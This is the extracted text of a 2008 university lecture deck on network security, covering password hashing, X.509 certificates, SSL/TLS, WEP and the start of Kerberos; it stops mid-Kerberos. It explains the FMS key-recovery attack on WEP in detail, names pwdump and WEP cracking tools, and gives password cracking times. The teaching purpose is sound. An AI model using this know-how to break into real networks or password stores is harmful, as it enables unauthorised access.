Solutions pour la Scurit des rseaux Prof. Gildas Avoine UCL - - PowerPoint PPT Presentation

École Internationale de Printemps Systèmes Répartis : METIS’2008 Architecture, Sécurité & Fiabilité Rabat, 20-23 Mai 2008

• Prof. Gildas Avoine

UCL Belgium

Solutions pour la Sécurité des réseaux

Introduction

Confidentiality, Integrity, Authentication, Availability. Is security important, or just a toy for academia?

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Security Incident: A Real Issue

Issues are real and have significant consequences.

Cost (direct, indirect). Image of the company. Competitive intelligence.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

How to Manage Security

Locksmiths don’t secure

a building, architects do.

According to Thucydide:

its not the walls that protect the citadel, but the spirit of its inhabitants.

Attack the weakest link.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Our Focus

We focus on the communication security. Symmetric-key Authentication Public-key Authentication SSL/TLS (public key, many-to-one) WEP (symmetric key, many-to-one) Kerberos (symmetric key, many-to-many) PGP (public key, many-to-many)

Symmetric-Key Auth.

Passwords One-Time Passwords Challenge-Response

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Identification, Authentication

Identification: We identify a person or entity, that is

we receive the name he agrees to provide.

Authentication: We get a proof that the person we

speak with is the right one.

Example, when log-on: we use the username for

identification, and the password for authentication.

Authentication can be done with the help of:

Something he possesses (token). Something he is (biometrics). Something he knows (password, key).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Passwords vs Keys

Password: human-memorizable.

Issue: weak entropy.

Keys: used by computers, not by humans.

Issue: where to store them.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Pwd: Naïve Idea

Password file User

123456 abc123 qwerty … 123456 All passwords are revealed if the password file is stolen!

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Passwords are never stored as such. The risk of theft

would be too high.

Instead of passwords, we store a hash.

Resistant to first preimage. Resistant to second preimage. Resistant to collision. Random oracle.

When logging in, the hashed

password is compared with the stored hash.

Password Storage

h message (pwd) hash ciphertext E plaintext key

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

*%-=(+ +S%dc- z5’0lé ...

Implemented Idea

Password file User

123456

Hash

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Win NT/2000/XP (NT LM Hash)

Win NT/2000/XP uses the NT Lan Manager Hash

(aka NT hash).

Passwords can be longer than 14 characters (but

compatibility issues arise beyond 14 characters).

Lowercase letters are not converted to uppercase. The hash function is MD4

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Win 9x Passwords (LM Hash)

Win98/ME uses the Lan Manager Hash (LM hash). The password is cut in two blocks of 7 characters

after completion to 14 characters with empty char.

Lowercase letters are converted to uppercase. A separate hash is generated for each 7-char block. The 7 bytes block are used as DES keys to encrypt an

8-byte constant string:

0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Win 9x Passwords (LM Hash)

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

LM Hash & NT Hash

By default, LM Hash and NT Hash are both stored on

the computer for compatibility reasons.

We can deactivate the creation of LM hash:

Require to modify the registry. Deactivated by default in Windows Vista. Choosing a pwd longer than 14 char desactivates the LM

Hash.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Cracking a (the) Password(s)

Online Attack

The system is used as an oracle (black box). Slow. How to avoid such an attack?

Offline Attack

We recover the passwords offline. Need to steal the hash file. How to avoid such an attack?

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Storage

The hash file is encrypted, but by default the key can

be extracted from the machine.

If the machine is running we need administrator

privileges plus a special exploit (pwdump) to extract the hashes (Windows).

If we can boot another OS, we can steal and decrypt

the hashes.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Weak Passwords

Percent Length 0.93% 13-32 0.93% 12 2.7% 11 13% 10 17% 9 25% 8 23% 7 15% 6 1.1% 5 0.82% 1-4

Source: www.schneier.com

1.3% numbers only 8.3% non-alphanumeric 81% alphanumeric 9.6% letters only

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Dictionary Attacks

Based on common dictionary words

Including dictionary words that have been altered:

Reversed (e.g., “terces”) Mixed case (e.g., SeCreT) Character/Symbol replacement (e.g., “$ecret”) Words with vowels removed (e.g., “scrt”) Numbers concatenated to word (e.g., “house123”)

Based on common names. Based on user/account identifier. Short (under 6 characters). Based on keyboard patterns (e.g., “qwerty”). Composed of single symbol type (e.g., all characters). Resemble license plate values.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Top-used passwords are (in order): “We used to quip that ‘password’ is the most common

• password. Now it's ‘password1.’ Who said users

haven't learned anything about security?” (Schneier, 2006).

password1, abc123, myspace1, password, blink182, qwerty1, fuckyou, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1, monkey.

Weak Passwords

Source: www.schneier.com

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Cracking Times

mAI-2On MAI2SON MAISONT 8 7 6 100 days 100 days 1.2 days LM Spec 5 h 5 h 9 m alphanum 33m 33 m 77 s alpha

length

Windows LM Hash mAI-2On MAI2SON MAISONT 8 7 6 196 years 1.7 years 5.7 days UNIX Spec 630 days 10 days 3.9 h alphanum 14 days 33 m 77 s alpha

length

Unix (56 bits DES)

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Some Vulnerabilities

Written down passwords. Shoulder surfing. Social engineering. Key logger, Rootkit. Eavesdropping the network. Multi-website passwords. Audit trails. Guessing the password (low entropy).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Alternative: One-Time Pwds

A chain of hashes is generated. The last element (hn) is provided to the verifier. The first element (h1) is provided to the prover. To authenticate himself, the prover sends hn-1 to the

verifier.

Nobody is able to compute hn-1 except the prover.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Challenge-Response

A challenge sent by the verifier is encrypted by the

prover with a secret k.

The secret never transits on the channel. The password is hashed to generate a key. c Ek(c) Verifier Prover

Public-Key Authentication

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Certificate Gildas Avoine

Certificate Primer

bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla bla Signature by Gildas Public key Signature by trusted party Trusted Party Public key Signature by trusted party Root Certificate

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

X.509: Certificates in Practice

X.509: Standard from International

Telecommunication Union (ITU), released in 1988

Then IETF RFC-2459 (and updates). Three required fields: TBS Certificate (TBS = “To Be Signed”)

The useful payload of the certificate (see next slide).

Signature algorithm

Identifier for the cryptographic algorithm used by the

CA to sign this certificate.

Signature value

Signature of the certificate by the CA.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

X.509: TBS Certificate

Serial number

Unique number assigned by the CA to the certificate.

Issuer field

Identifies the entity who has signed and issued the certificate.

Subject

Identifies the entity associated with the public key (O:organization,

C: country, OU: Organization Unit, CN: common name eg. DNS, ST: state, L: city, etc. no IP address).

Validity

Not before, not after.

Subject Public Key Info

Public key and identify the algorithm with which the key is used

(e.g., RSA, DSA, or DH)

Etc.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

UCL Webmail

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Root Certificate Example

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Belgian Passport Certificate

Certificate: Data: Version: 3 (0x2) Serial Number: 10 (0xa) Signature Algorithm: sha1WithRSAEncryption Issuer: C=BE, O=Kingdom of Belgium, OU=Federal Public Service Foreign Affairs Belgium, CN=CSCAPKI_BE Validity Not Before: Apr 10 00:00:00 2006 GMT Not After : Jul 15 23:59:59 2011 GMT Subject: C=BE, O=Kingdom of Belgium, OU=Federal Public Service Foreign Affairs Belgium, CN=DSPKI_BE Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (2048 bit) Modulus (2048 bit): 00:8f:9c:2c:f8:05:b5:bd:ed:51:1a:9f:b0:57:6e: 86:53:07:46:ac:ab:b6:05:e7:d6:e8:a6:6a:7b:ba: 9b:27:aa:8a:9f:80:ec:87:b3:9d:68:b7:29:cb:b1: df:de:5e:48:9e:34:21:9f:97:ea:98:7a:f7:f6:88: 1c:ca:a3:b1:3f:b2:d8:36:9a:06:0b:b3:f0:02:20: ce:ff:a9:e2:12:00:b2:1d:71:df:3e:cc:64:83:e2: f9:e8:30:15:a5:62:95:ab:8e:8c:ee:dc:73:9a:9f: 58:78:c9:38:fd:ae:7c:71:17:73:c8:64:23:d2:34: 99:58:ef:bc:ca:dc:e3:38:39:d4:30:16:c1:8e:52: a9:b0:eb:7f:5f:06:65:02:bc:72:1e:eb:14:40:af: 39:20:25:48:cf:2f:8e:1b:4f:2e:d6:fb:49:b7:ab: a3:e5:56:2e:31:a1:30:56:69:dc:4f:b4:d8:49:a4: af:e6:0c:e8:65:df:58:d5:ee:7f:80:02:d5:35:63: 2a:14:81:0a:eb:7d:5e:17:f8:63:9a:67:28:b0:b8: f4:39:0b:cb:91:63:4b:e3:14:e0:69:dd:dd:92:26: b2:8b:a4:0c:4d:de:10:b8:96:2b:e7:f1:ac:2e:2f: 11:15:bd:13:1d:61:c4:bf:69:24:28:9f:67:dd:b6: 49:b5 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Authority Key Identifier: keyid:00:84:19:14:B2:CE:7E:0A:DE:3A:26:F9:FD:DD:1F:F4:01:42:A8:0E X509v3 Key Usage: critical Digital Signature Signature Algorithm: sha1WithRSAEncryption 5d:ed:53:da:14:3d:e2:ab:2d:41:3c:ea:bc:55:3b:78:2a:2c: 8e:0b:54:74:af:bd:a9:e1:c5:92:a4:f0:db:a9:0b:7d:0c:96: …

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Certification Authorities

Issuers of certificates found

• n web servers.

Source:

www.securityspace.com

Verisign, GeoTrust, and

Thawte: same group.

7.64 Comodo Limited 0.79 Snake Oil Ltd 0.85 SWsoft Inc 0.86 Chained SSL 1.22 SomeOrganization 1.51 AddTrust AB 1.61 Entrust.Net 1.85 Unkown 2.76 Starfield Technologies 15.21 Thawte 19.56 GeoTrust (Equifax) 29.25 Verisign

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Obtaining a Certificate

1.

Each new participant must present himself.

2.

The CA (physically) authenticates the participant.

3.

It asks the participant to generate a pair of public/private keys.

4.

It creates a certificate with the participant’s identity, his public key, an expiry date, etc. and the CA’s signature.

5.

It provides a copy of its own public key to the participant.

6.

The new participant can communicate with all other participants who share a common “trusted ancestor”.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Public-Key vs Sym-Key

Advantages ? Drawbacks ?

SSL/TLS

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Client-server communications, random client,

corporate server.

Authentication of server based on public key. Trusted third party: certificate authority (CA).

SSL Primer

client server eavesdropping fake server fake client Modifying

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Secure Sockets Layer (SSL)

The most widely deployed security protocol in the

world.

SSL was developed by Netscape to offer secure

access to web servers (https).

History

SSL v1.0 never publicly released. SSL v2.0 released in 1994 (flawed). SSL v3.0 released in 1996, leads to TLS 1.0 (1999).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Transport Layer Security

TLS is an IETF’s standard based on SSL v3.0:

Slight modifications compared to SSL v3.0. TLS v1.0 and SSL v3.0 do not interoperate. TLS v1.0 sometimes called SSL v3.1. TLS v1.0 defined in RFC 2246.

Current approved version:

TLS v.1.1 Released in 2006 RFC 4346 Fixes a vulnerability discovered by Vaudenay.

Next proposed version:

TLS v.1.2 Draft expires Sept 2008, may lead to RFC 4492.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

SSL in the Layers

Data Link Physical Layer Network Transport SSL Application

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Applications

Either create a new protocol from an existing

protocol:

Examples: HTTP (80) / HTTPS (443), FTP (21) / FTPS (990),

SMTP (25) / SMTPS (995), POP3 (110) / POP3S (995), IMAP (143) / IMAPS (993).

Disadvantage: only clients supporting TLS can connect Advantage: we are sure that the communication are secure.

Or extend a protocol to negotiate SSL/TLS:

Examples: (E)SMTP, POP3, IMAP, with the help of the

STARTTLS command the client can ask to use TLS.

Advantage: the client is not required to support TLS to use

the service.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Example: Web

HTTPS

The use of TLS or not is not negotiable. Guarantees confidentiality of transmitted data and

authenticity (server, possibly client).

The server must have a certificate The client can have one (eg eBanking)

HTTPS

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

TLS Layers

For initializing a session For setting-up cryptographic algorithms For managing warnings and fatal errors For passing data from an application to the record layer in a transparent manner

Processing data

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

TLS Record Layer

Processing of data:

Fragmentation Compression (optional) Authentication Encryption

It delivers such processed fragments to the

transport layer (TCP).

At the receiving end, the inverse operations are

carried out.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Record Layer Summary

Data Data Data MAC MAC Encrypted Data and MAC Encrypted HEADER HEADER

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Encryption

Encryption is performed on compressed and

authenticated records.

Block ciphers:

DES (40 bits or 56 bits), 3DES, IDEA, RC2 (40 bits) Why 40-bit key alternative? AES (128 bits or 256 bits) in TLS v1.1

Stream ciphers:

NULL, RC4 (40 bits or 128 bits).

The client should refuse 40-bit keys if such a cipher

is suggested by the server (warning enforced in TLS 1.1).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Handshake in Brief

Negotiation of:

The protocol version (SSL 3.0, TLS 1.0, TLS 1.1). The algorithms:

Key exchange (RSA, Diffie-Hellman). Encryption (DES, 3DES, IDEA, RC4, RC2, AES). MAC (HMAC-MD5, HMAC-SHA). The client proposes the desired algorithms in order of

preference, the server chooses.

Optional authentication of the partner using a

certificate.

Messages are not encrypted. Last messages authenticate the exchange.

WEP

Introduction to WLAN WEP Description Attacks on WEP (Theory) Attacks on WEP (Practice)

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Infrastructure Mode

Access points connect to wired network. Multiple mobile stations per Access Point.

Full internet connection for mobile users.

University campus. Coffee shops. Airport lounges.

W i r e d n e t w

• r

k

Access Point (AP) Mobile Devices

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Ad Hoc Mode

Wireless stations communicate directly, without a

wired network.

On the fly networking.

Impromptu meeting. Rescue operations.

LAN set up is difficult.

Natural areas.

LAN set up is dangerous.

Battle field. People are not aware that they launch an ad hoc

network eg. search for networks in a train…

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Eavesdropping Range

Typical use inside: ~30m Typical outdoor range with suited antenna: ~5 km. Record: 382 km by EsLaRed of Venezuel (2007).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

War Driving

Just discovering WiFi

networks, no unauthorized access.

To war-drive:

Laptop 802.11 card Software GPS Car

While you drive:

Listens and builds map of

all WiFi networks found.

Examples:

www.wigle.net www.wardriving.com

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Map of WiFi APs.

Source: www.wigle.net

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication, Encryption

Authentication

Open systems Do not broadcast AP’s SSID MAC address filter WEP WPA / WPA2

Encryption

WEP WPA / WPA2

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication: Open Systems

No authentication at all. Less and less used?

Usually, providers impose authentication by default.

Not the case with Belgacom (Observed in 2007).

Public free hot spots without authentication. Non-free hot spots in hotels, train stations, etc.

High Level Authentication (eg. RADIUS Server).

Communities sharing their access.

• Eg. Communauté Neuf Wifi.

What kind of problem do we face?

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication: AP’s SSID

The AP broadcasts its SSID. Allow clients to dynamically

discover the AP.

Can be used to authenticate a client Client must know the SSID. Not secure because SSID can be

eavesdropped.

When a legitimate client connects

to the AP.

Can be used to restrict features.

• Eg. Club Internet by default (Observed in 2007).

People pay to activate the wireless feature of their router. Lack of broadcast can be due to the channel number.

Do not broadcast the SSID.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication: AP’s SSID

In practice, snif the environment with eg. Kismet,

Airodump, Network Stumbler (Windows), etc.

Kismet in a Linux shell

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication: MAC Address

The router has a list of authorized MAC addresses.

The router checks the MAC address of the station trying

to connect to the network.

Attacker can read MAC address of a legitimate wireless

station and replace his own MAC address with the stolen

• ne.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication: MAC Address

MAC addresses of the devices connected to the AP

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

WEP Features

Authentication ("shared key" user authentication). Confidentiality (RC4 stream cipher encryption). Integrity checking (CRC-32 integrity mechanism). No key management. No protection against replay attacks.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Authentication + Enc: WEP

WEP = Wired Equivalent Privacy. Part of 802.11 Standard (1999) The stated goal of WEP is to make wireless LAN as

secure as a wired LAN.

According to Tanenbaum:

“The 802.11 standard prescribes a data link-level security

protocol called WEP (Wired Equivalent Privacy), which is designed to make the security of a wireless LAN as good as that of a wired LAN. Since the default for a wired LAN is no security at all, this goal is easy to achieve, and WEP achieves it as we shall see.”

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

No key management in WEP: every wireless station and AP has the same "preshared" key that is used during authentication and encryption. This key is distributed manually.

No Key Management

Key A Key A Key A Key A

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

No Key Management

In practice:

Key is loaded in device by hand when set up.

Often keep manufacturer’s default.

Printed under the router, in the user guide, etc.

Never updated again.

Same key for everybody:

In a large network, users may wish to have independent

secure connections. Just a single non-honest WLAN user can break the security.

Static key:

Since it is relatively easy to crack WEP encryption in a

reasonably short time (see next slides), the keys should be changed often, but the preshared key concept does not support this.

Belgacom’s default WEP keys… (64 bits)

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Replay Attacks

The adversary can “replay” a packet she has already

seen.

Solutions?

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Integrity

Integrity is ensured using a CRC. CRC does not provide a cryptographic integrity check.

CRC designed to detect random errors. Not designed to detect intelligent changes.

In WEP, the message is concatenated to the CRC,

then encrypted.

The encrypted message can be modified s.t. it is still valid

after decryption.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

MAC address Challenge (128 bytes) Response (encrypted) Status code Authentication is successful, if WEP decryption gives original challenge text

WEP Authentication

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Stream Cipher

plaintext secret key ciphertext

Stream Cipher keystream

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

RC4 for WEP Encryption

plaintext secret key ciphertext

RC4 keystream

checksum IV

24 bits 40 bits

IV

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

RC4: A Well-kown Stream Cipher

Designed by Ron Rivest (MIT) in 1987 for RSA Labs.

Kept as a secret trade until 1994. Publicly disclosed in Sept. 1994 on Cypherpunks’ mailing list.

Bytes-oriented

Generate keystream byte at a step

Efficient in software (compared to LFSR, Block Ciph.).

Encryption in software is about 10 times faster that DES. Simple and elegant.

Widely used:

Commercial softwares as MS Office, Oracle Secure SQL. Network protocols as SSL, IPSec, WEP. Copy protection: inside MS XBOX.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Attacks on RC4

Not under the spotlights as all other stream ciphers. Theoretical attacks. Weak keys. To be used carefully.

Remove the first bytes (e.g. the first 768 bytes) to avoid

some attacks…

Do not encrypt too long stream to avoid other attacks… If plaintext and ciphertext known, then keystream known.

No problem if keystream is not reused. If keystream reused, at least as bad as reuse of one-time pad.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

#1 Known-Plaintext Attack

WEP uses 24-bit (3 byte) IV.

Each packet gets a new IV. RC4 packet key: IV pre-pended to long-term key, K.

If long-term key and IV are same, then same

keystream is used.

There is a 50% chance of key-reuse after 212 packets

(birthday paradox).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

#1 Known-Plaintext Attack

Keystream leaks, under known-plaintext attack.

Suppose we intercept a ciphertext C, and suppose we can

guess the corresponding plaintext P

Let Z = RC4(K, IV) be the RC4 keystream Since C = P ⊕ Z, we can derive the RC4 keystream Z by P ⊕

C = P ⊕ (P ⊕ Z) = Z

This is not a problem ... unless keystream is reused!

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

#2 CRC Property

CRC is a linear function wrt to XOR:

CRC(X ⊕ Y) = CRC(X) ⊕ CRC(Y)

Attacker observes (M | CRC(M)) ⊕ K where K is the

key stream output.

For any ∆M, the attacker can compute CRC(∆M). Hence, the attacker can compute:

([M | CRC(M]) ⊕ K) ⊕ [∆M | CRC(∆M)] = ([M ⊕ ∆M) | (CRC(M) ⊕ CRC(∆M)]) ⊕ K = [M ⊕ ∆M) | CRC(M ⊕ ∆M)] ⊕ K

Example: Modify an IP address

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

#3 Statistical Cryptanalysis

Fluhrer, Mantin, and Shamir (FMS) – 2001

Two years only after WEP was published. Some IVs are weak, ie, they allow to guess some internal

states, leading to the key.

IV and first byte of plaintext/ciphertext must be known.

IV is sent in the clear. Ciphertext is eavesdropped. First bytes of ARP or TCP are fixed or can be easily

guessed.

4 million IVs to recover a 128-bit key. Number of IVs linear with the key-length (vs exponential) Key is revealed byte after byte (sequentially)

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Korek - 2004

Proposed 17 attacks based on FMS. New classes of weak IVs. 1 million IVs. 2 bytes must be observable.

Tews, Weinmann, Pyshkin (PTW) - 2007

Still new classes. 80’000 IVs. More bytes must be observable Variant by Vaudenay/Vuagnoux (32’000 IVs) Key bytes are no longer necessarily guessed sequentially.

#3 Statistical Cryptanalysis

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

WEP Cryptanalytic Attack

WEP data encrypted using RC4.

Packet key is IV and long-term key K.

3-byte IV is pre-pended to K. Packet key is (IV,K).

IV is sent in the clear (not secret).

New IV sent with every packet. Long-term key K never changed.

Assume Trudy (=attacker) knows IVs and

ciphertext, and can guess the first bytes of the plaintext.

Trudy wants to find the key K.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

3-byte IV pre-pended to key. We denote the RC4 key bytes: K0,K1,K2,K3,K4,K5,…

Where IV = (K0,K1,K2), which Trudy knows Trudy wants to find K3,K4,K5,…

Attack due to Fluhrer, Mantin, and Shamir:

Trudy watches IVs until she sees 3-byte IV of the form:

IV=(K0,K1,K2) = (3,255,X) where X can be anything.

Then RC4 key for this packet is key = (3,255,X,K3,K4,K5,…)

WEP Cryptanalytic Attack

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

RC4 Steps

KSA (Key-Scheduling Algorithm)

Initialization Scrambling

PRGA (Pseudo-Random Generation Algorithm)

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

WEP Cryptanalysis

… … Ki i K4 K3 X 255 3 4 3 2 1

i=3, j=(5+X)+(1)+K3=6+X+K3 i=2, j=3+S2+K2=3+2+X=5+X i=1, j=3+S1+K1=3+1+255=3 [N] i=0, j=0+S0+K0=0+0+3=3

initial state

… 1 … 2 … 4 6+X+K3 5+X 3 i=3 … 6+X+K3 … 2 … 4 1 5+X 3 i=2 … 6+X+K3 … 5+X … 4 1 2 3 i=1 … 6+X+K3 … 5+X … 4 2 1 3 i=0 … 6+X+K3 … 5+X … 4 3 2 1 init … 6+X+K3 … 5+X … 4 3 2 1 i\S

Scrambling j = 0 For i = 0 To N-1 j = (j + Si + Ki) mod N Swap(Si,Sj) Initialization //N=256 For i = 0 To N-1 Si = i

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Assumption: 6+X+K3 > 5+X (mod N).

Otherwise 6+X+K3 will be to the left of 5+X.

Up to now, we have only considered the first 4 steps

• f initialization, i = 0,1,2,3.

In reality, there are 256 steps.

For now, assume that initialization stops after i = 3. So, outputted keystream is:

WEP Cryptanalytic Attack

PRGA //init i=j=0 i = (i + 1) mod N = 1 j = (j + Si) mod N = S1 = 0 Swap(Si, Sj) Swap(S1, S0) Output S(Si+Sj) mod N Output S3 = 6+X+K3

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Note: keystreamByte = 6+X+K3. If keystreamByte is known, we can solve for K3 since

K3 = (keystreamByte−6−X) mod N.

But initialization does not stop at i=3. So can this “attack” really work?

If elements at 0,1 and 3 not swapped in remaining

initialization steps, attack works.

WEP Cryptanalytic Attack

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Can Trudy really recover the key?

If she sees enough IVs she gets K3.

Suppose Trudy has found K3.

Then how to find K4?

Consider IVs of the form: IV = (4,255,X).

Then after initialization step i=4, one could show that:

keystreamByte = S4 = 10+X+K3+K4.

And so on…

WEP Cryptanalytic Attack

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Attack Summary in Practice

Client IP Discovery phase. (Flooding). Sniffing IV’s and keystreams. Key cracking.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Downloadable Tools

AirCrack-ng

http://www.aircrack-ng.org Implement Korek, PTW (needs ARP flooding). Available eg in BackTrack.

WepCrack

http://sourceforge.net/projects/wepcrack/ “WEPCrack is a tool that cracks 802.11 WEP encryption keys

using the latest discovered weakness of RC4 key scheduling.”

Last version: Oct 2004

AirSnort

http://airsnort.shmoo.com/ Last update: 2005. Implement Korek’s attacks.

Kerberos

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

How do users prove their identities when requesting

services from servers on the network?

Solution: every server knows every user’s password.

Insecure: break into one server may compromise all users. Inefficient: passwords must be changed on every servers. Not convenient: passwords must be typed for each request.

Many-to-Many Authentication

users servers

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

users servers

User proves his identity and requests a credential. Trusted third party provides a credential to the user. Credential is supplied to get the expected service.

2 3 1

The credential aka ticket is an identity proof but does not necessarily give the ability to use a given service.

Server-Aided Authentication

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Server-Aided Authentication

Hypotheses:

There is an online (trusted) authentication server (AS). AS shares KC with client C. AS shared KS with server S.

Goal:

To help C and S to share a session key K.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Very Weak Example

Identity of the Client Identity of the Server

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

The client can give the server’s key to other clients.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Weak Example

An attacker can replace Ic by IA

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

A solution consists in not revealing the server’s key: AS encrypts itself the session key K with the server’s key. “sealed envelop”

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Still Weak Example

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

Replay attack by impersonating AS if K is compromised, due to careless users: no means to be sure that K is fresh.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Needham Schroeder (1978)

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

Replay attack by impersonating C if K is compromised, due to careless users: no means to be sure that K is fresh.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Kerberos V

The name Kerberos comes from Greek mythology.

It is the three-headed dog that guarded Hades’ entrance.

Created at the MIT, free of charge.

Kerberos 4 (1988), obsolete. Kerberos 5 (1993), RFC 1510, then RFC 4120 (2005).

Deployed:

Initially on Unix systems. Used in many commercial products eg Windows from 2K.

Based on symmetric-key cryptography.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Kerberos V

Once you log into a workstation after authentication,

you can access remote resources without any more input of username and password .

Kerberos software on the workstation will finish the

authentication automatically on behalf of you.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

C S AS TGS 5 6 4 3 1 2

Kerberos Elements

Client C. Authentication server AS

a.k.a. KDC (key distribution center)

Ticket granting server TGS. Server S which the client wants to access to. 1- Request a Ticket Granting ticket 2- Provide a Ticket Granting Ticket 3- Request a Ticket for a given service 4- Provide a Ticket for a given service 5- Forward the Ticket 6- Provide a service

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Tickets

To access a service, the client must have a ticket for

that service.

The user can get this ticket from the Ticket Granting

Server (TGS).

The service ticket confirms that the user can access

the service.

The Ticket Granting Ticket (TGT) only confirms the identity

• f the user.

The client shows a ticket + an authenticator.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Tickets, Authenticators

The ticket contains:

Ic: the client’s identity. v: validity period. Kc,s: symmetric session key to be used between the client and

the server.

Others: Flags, IP address, etc.

It is encrypted with the key of the server Ks. The authenticator is just the client’s identity and a

timestamp encrypted with the session key.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

C S AS TGS 1 2

Between C and AS

To start, the user must authenticate at the AS to

have access to the TGS.

C sends his name and the name of the TGS he wants

to access to the AS.

